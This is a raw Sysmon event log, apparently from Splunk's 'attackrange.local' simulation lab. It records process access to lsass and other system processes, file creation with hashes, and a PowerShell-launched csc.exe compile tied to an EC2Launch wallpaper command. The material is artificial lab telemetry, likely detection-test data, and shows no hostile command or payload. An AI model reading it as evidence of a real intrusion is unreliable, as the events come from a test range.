09:22:03.756{5EBD8912-8D26-6151-8500-00000000FD01}27603956C:\Windows\system32\csrss.exe{5EBD8912-8D3B-6151-9F00-00000000FD01}5544C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001056035Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:03.756{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056034Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:03.756{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056033Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:03.756{5EBD8912-8D37-6151-9D00-00000000FD01}26445156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{5EBD8912-8D3B-6151-9F00-00000000FD01}5544C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2be405|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2be05f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2bdb80|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2bdb08|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2bc1c3|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+7d8e81|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+7d828a|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\3143b7407cd40db6cd5387f74bfeadef\Microsoft.PowerShell.Commands.Utility.ni.dll+3e0(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\3143b7407cd40db6cd5387f74bfeadef\Microsoft.PowerShell.Commands.Utility.ni.dll+3e0(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+852694bb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+8524347d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+852430b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+85d0b3e6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+8520002a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+85263a9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+85245aab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+85245aab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+85245c2b(wow64)|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\clr.dll+58e06 154100x80000000000000001056032Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:03.735{5EBD8912-8D3B-6151-9F00-00000000FD01}5544C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe4.8.3761.0 built by: NET48REL1Visual C# Command Line CompilerMicrosoft® .NET FrameworkMicrosoft Corporationcsc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Administrator\AppData\Local\Temp\0l4ej4k0\0l4ej4k0.cmdline"C:\Windows\system32\ATTACKRANGE\Administrator{5EBD8912-8D28-6151-085E-080000000000}0x85e082HighMD5=23EE3D381CFE3B9F6229483E2CE2F9E1,SHA256=4240A12E0B246C9D69AF1F697488FE7DA1B497DF20F4A6F95135B4D5FE180A57,IMPHASH=EE1E569AD02AA1F7AECA80AC0601D80D{5EBD8912-8D37-6151-9D00-00000000FD01}2644C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NonInteractive -NoLogo -WindowStyle hidden -ExecutionPolicy Unrestricted "Import-Module "C:\ProgramData\Amazon\EC2-Windows\Launch\Module\Ec2Launch.psd1"; Set-Wallpaper" 11241100x80000000000000001056031Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:03.725{5EBD8912-8D37-6151-9D00-00000000FD01}2644C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\0l4ej4k0\0l4ej4k0.cmdline2021-09-27 09:22:03.725 11241100x80000000000000001056030Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.localDLL2021-09-27 09:22:03.725{5EBD8912-8D37-6151-9D00-00000000FD01}2644C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\0l4ej4k0\0l4ej4k0.dll2021-09-27 09:22:03.725 10341000x80000000000000001056029Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:03.584{5EBD8912-8CBD-6151-0B00-00000000FD01}640764C:\Windows\system32\lsass.exe{5EBD8912-8D3B-6151-9E00-00000000FD01}5480C:\Windows\system32\wbem\wmiprvse.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056028Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:03.584{5EBD8912-8CBD-6151-0B00-00000000FD01}640764C:\Windows\system32\lsass.exe{5EBD8912-8D3B-6151-9E00-00000000FD01}5480C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056027Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:03.522{5EBD8912-8CC0-6151-1600-00000000FD01}12965472C:\Windows\system32\svchost.exe{5EBD8912-8D3B-6151-9E00-00000000FD01}5480C:\Windows\system32\wbem\wmiprvse.exe0x101541C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+20fee|C:\Windows\system32\wbem\wmiprvsd.dll+43f7|C:\Windows\system32\wbem\wmiprvsd.dll+15538|C:\Windows\system32\wbem\wmiprvsd.dll+1498a|C:\Windows\system32\wbem\wmiprvsd.dll+146e6|C:\Windows\system32\wbem\wmiprvsd.dll+140fe|C:\Windows\system32\wbem\wbemcore.dll+b920|C:\Windows\system32\wbem\wbemcore.dll+255ff|C:\Windows\system32\wbem\wbemcore.dll+24a9a|C:\Windows\system32\wbem\wbemcore.dll+2485e|C:\Windows\system32\wbem\wbemcore.dll+dc51|C:\Windows\system32\wbem\wbemcore.dll+2cfdf|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056026Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:03.491{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8D3B-6151-9E00-00000000FD01}5480C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056025Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:03.397{5EBD8912-8CBD-6151-0500-00000000FD01}416532C:\Windows\system32\csrss.exe{5EBD8912-8D3B-6151-9E00-00000000FD01}5480C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001056024Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:03.381{5EBD8912-8CBF-6151-0C00-00000000FD01}8448C:\Windows\system32\svchost.exe{5EBD8912-8D3B-6151-9E00-00000000FD01}5480C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+366e9|c:\windows\system32\rpcss.dll+3bed2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056023Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:03.381{5EBD8912-8CBF-6151-0C00-00000000FD01}8448C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056022Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:03.381{5EBD8912-8CBF-6151-0C00-00000000FD01}8448C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056021Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:03.366{5EBD8912-8CBD-6151-0B00-00000000FD01}640764C:\Windows\system32\lsass.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a16d|C:\Windows\system32\lsasrv.dll+2704b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001056020Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:03.209{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=CBC35BEFE09EFB6F621571A5F8E59F30,SHA256=F0BBA41B4138C1D0798FD6A1E2F24E1AE7B190DC02C5F3360E8BA4D1C9073E82,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056019Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:03.162{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=D4D58AB3C878F84F48B75713C8E46301,SHA256=0F9791716557DE37D933560F81857DB6056E10B8526540135673D076347A04D5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056018Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:03.100{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=C1051DF76E29827E5F156968FB38AE2E,SHA256=56B415CEFCFCCCBD4C744B9F0C233A843996987664D90BC581A5B4075DA186E5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056017Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:03.037{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=5D54B4B4AB9A26F5D00BCD888F5657B7,SHA256=85D86821211DCB248568BFDC6BE1DB105FC63FEF447C2A163240AAA2CF18D096,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056016Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:02.990{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=0CBAE3E69F1F9E461ECFC43C65AF7D34,SHA256=E7D81A3BBDC3BE83D83105DEF2A21C13AA0D15593C37F2BFB7568CABD1327E4E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980920Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:04.918{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=12F118858750094D430E395068BED628,SHA256=D238374E7F97E2526A5377CCD83FB9B4AA617BC970C7F1CB99A7262B20915477,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056069Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:04.428{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E0E8476A0043F5213D88227D8FA6306B,SHA256=13D7FE8E5AFDAC642F09841B5D3F4B26F8CD3D20A83450C20F6F638FBC962E96,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056068Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:04.288{5EBD8912-8D37-6151-9D00-00000000FD01}2644ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\0l4ej4k0\0l4ej4k0.outMD5=420F43C47E1232F592BCB104E1AA2DDD,SHA256=7E84A17647247BF89E802FC00FB1F1884B132E7A34A70F73FB4FF518BD4A892C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056067Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:04.288{5EBD8912-8D37-6151-9D00-00000000FD01}2644ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\0l4ej4k0\0l4ej4k0.dllMD5=9CBFC897E9CD27996C3CACF2C7B21E88,SHA256=4E889B06E8D0F6061FEBB08CD8D4A6EE569E10CD97FFF6D10E172E1842154D15,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x80000000000000001056066Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:04.272{5EBD8912-8D37-6151-9D00-00000000FD01}2644ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\0l4ej4k0\0l4ej4k0.cmdlineMD5=9EE409D4EA3E0488310B7F3D8F8D7E78,SHA256=12A8D472E7CF8E425948D8AA6B6A2B33DF5E43F8DEA598F0BB33931887DA07EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056065Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:04.272{5EBD8912-8D37-6151-9D00-00000000FD01}2644ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\0l4ej4k0\0l4ej4k0.0.csMD5=D9ACA9FFA16C22410A16DE5D5571469D,SHA256=74E86BCD8E601DAC165642F69B571B651867BE0251D7B3D9498D1F080E4D8391,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056064Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:04.241{5EBD8912-8D3B-6151-9F00-00000000FD01}5544ATTACKRANGE\AdministratorC:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\0l4ej4k0\CSC69C054AE4EAE444FA3BD1D3A191A4DDF.TMPMD5=676A837A435E01576B967CC37D788BD3,SHA256=8598FB9556AE9A5F69EDB57F481B51F8B8F67068C0F0844C83D29ADA6838E7B3,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001056063Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.localDLL2021-09-27 09:22:04.178{5EBD8912-8D3B-6151-9F00-00000000FD01}5544C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\0l4ej4k0\0l4ej4k0.dll2021-09-27 09:22:03.725 23542300x80000000000000001056062Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:04.178{5EBD8912-8D3B-6151-9F00-00000000FD01}5544ATTACKRANGE\AdministratorC:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\0l4ej4k0\0l4ej4k0.dllMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056061Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:04.178{5EBD8912-8D3B-6151-9F00-00000000FD01}5544ATTACKRANGE\AdministratorC:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\ADMINI~1\AppData\Local\Temp\RES7044.tmpMD5=8FDF75B60F3631CD84C867C8325BEE99,SHA256=D0D4FF9B357F4AEB25527581FCB14EB79142685956D84F555BDD5B158C2C8415,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056060Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:04.131{5EBD8912-8D3C-6151-A000-00000000FD01}5584ATTACKRANGE\AdministratorC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Users\ADMINI~1\AppData\Local\Temp\RES7044.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001056059Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:04.116{5EBD8912-8D37-6151-9C00-00000000FD01}40324896C:\Windows\system32\conhost.exe{5EBD8912-8D3C-6151-A000-00000000FD01}5584C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056058Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 